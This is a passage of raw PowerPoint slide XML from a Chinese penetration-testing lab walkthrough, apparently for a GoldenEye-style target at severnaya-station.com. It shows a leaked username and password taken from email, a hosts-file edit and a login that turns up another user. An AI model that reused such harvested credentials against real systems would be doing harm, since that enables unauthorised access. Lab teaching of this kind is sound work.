                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F717438-2476-48CC-8874-1CE23F39B784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect t="48212" r="60768"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="424180" y="1905635"/>
            <a:ext cx="6036310" cy="3513455"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="圆角矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E234BF85-B909-4629-8E10-AEE0BF91CDDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455930" y="5584825"/>
            <a:ext cx="6004560" cy="831215"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cmpd="sng">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光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC2BD029-325B-4640-BADE-9B9EEC859FF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638175" y="5681980"/>
            <a:ext cx="5179060" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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仅仅可以由域名访问该网站，必须根据靶机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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配置域名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="直接箭头连接符 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AA47D70-9139-4518-A29E-A21EC82177AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4249420" y="5016500"/>
            <a:ext cx="1297940" cy="487045"/>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851D30FF-9991-474E-85C0-169A709553D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649700" y="1646295"/>
            <a:ext cx="5218166" cy="42107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好的，用户信用是：</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285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="1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用户名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>xenia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="1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密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RCP90rulez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>！</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285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="1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鲍里斯验证了她是一个有效的承包商，所以只需创建帐户好吗？如果您没有外部内部域的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>severnaya-station.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>gnocertdir</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285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>请务必编辑您的主机文件，因为您通常在远程离线工作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="1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由于您是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用户，因此只需将此服务器 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指向 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>severnaya-station.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1775480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修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件并登录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{474FA37C-7821-4020-BCAB-168578EE31BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="667751" y="1396145"/>
            <a:ext cx="9673994" cy="4569699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5826433-6864-41EF-8FD6-F147F6A77822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889229" y="3224768"/>
            <a:ext cx="6515007" cy="223708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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>设置本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>HOSTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>gedit /etc/hosts </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>192.168.4.202 severnaya-station.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>severnaya-station.com/gnocertdir</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>natalya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>邮箱第二封邮件获得的用户名密码登录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5656CEA5-2183-4408-946C-EBE3D81DCCA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6766914" y="2502946"/>
            <a:ext cx="5067124" cy="4057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78426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FEF0B55-FF38-48FD-972A-7257AD62D95A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="497035" y="792114"/>
            <a:ext cx="11103086" cy="5872260"/>
            <a:chOff x="-195760" y="699770"/>
            <a:chExt cx="11615960" cy="6050280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="图片 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFDB7FC4-EADF-49D0-AF1F-1800DA3F833D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5"/>
            <a:srcRect r="63800"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-195760" y="699770"/>
              <a:ext cx="5260370" cy="6050280"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B20641F-F3A7-496B-ADDB-7F2C1551586A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5"/>
            <a:srcRect l="56263"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5064610" y="699770"/>
              <a:ext cx="6355590" cy="6050280"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>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得到新的用户</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52C280A5-7393-4664-96F6-24F4F9D3A6E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760909" y="4782274"/>
            <a:ext cx="4016199" cy="168308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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在左侧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Messages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中查看信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>发现有一封邮件，内容发现用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>doak</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2586797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读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>doak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用户邮件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
